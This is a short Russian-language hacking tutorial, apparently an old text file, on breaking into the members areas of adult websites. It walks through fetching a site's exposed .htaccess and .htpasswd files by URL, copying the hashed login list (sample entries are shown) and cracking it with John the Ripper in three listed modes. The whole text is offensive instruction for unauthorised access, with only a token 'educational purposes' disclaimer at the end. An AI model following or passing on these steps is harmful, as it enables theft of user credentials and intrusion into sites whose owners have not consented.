Идите сами знаете куда и возьмите там работающий пароль к сайту который вы хотите взломать.
Шаг (2)
Затем вы должны войти на этот xxx сайт в "members section" ну например так www.xxxsite.com/members/index.html или типа этого..
Шаг (3)
Удалите слово index.html и наберите .htaccess например: www.xxxsite.com/members/.htaccess
Если вам повезет вы получите нижеследующее:AuthUserFile /www/xxxsite/members/.htpasswd <- место где лежит файл с паролями.AuthGroupFile /dev/null <- место где лежит groupfileAuthName Members Only Directory <-место где находится popup который просит вас ввести password/loginAuthType Basic <- другие типы авторизации apache btw.
Limit GET POST PUT <-require valid-user <-
Но реально вся эта лабуда не нужна для начала если .htaccess прошел сразу вместо него пишите .htpasswd и все OK.
Шаг (4), найдите passwordfile ( .htpasswd)
Шаг (5), удалите .htaccess и вместо наберите ( .htpasswd )
например :www.xxxsite.com/members/.htpasswd. После этого вы получите passwordlist. Пароли будут зашифрованы. Это будет выглядеть так:
ocean:q8ERltHeoxRG.
sydgator:458mLs4euQHwo
demi1:o7ad9QtJIklTY
demi2:Fx93hhGP/oTs6Y
233244:ZXEHRGfdsL9E346
Первое слово - логин , остальное после : пароли
Шаг (6)
Чтобы раскодировать пароли надо сначала скачать декодер ,например"John the ripper" .John the ripper расшифрует пароли на это уйдет примерно. ( 15000/сек. на 166mmx)
Шаг (7), Сохраните полученные логины и паролиШаг (8), Разархивируйте John The Ripper и наберите: ( предварительно поместив текстовый файл в директорию где лежит ripper)
John xxx.txt -single (Это самый быстрый способ и самый простой алгоритм.)
John xxx.txt -wordfile:password.lst (Это посложней)
John xxx.txt -incremental (Это самый сложный алгоритм и занимает время зато самый надежный)
Текст представлен только для учебных целей.Не используйте его на практике. Использование может повлечь за собой проблемы.
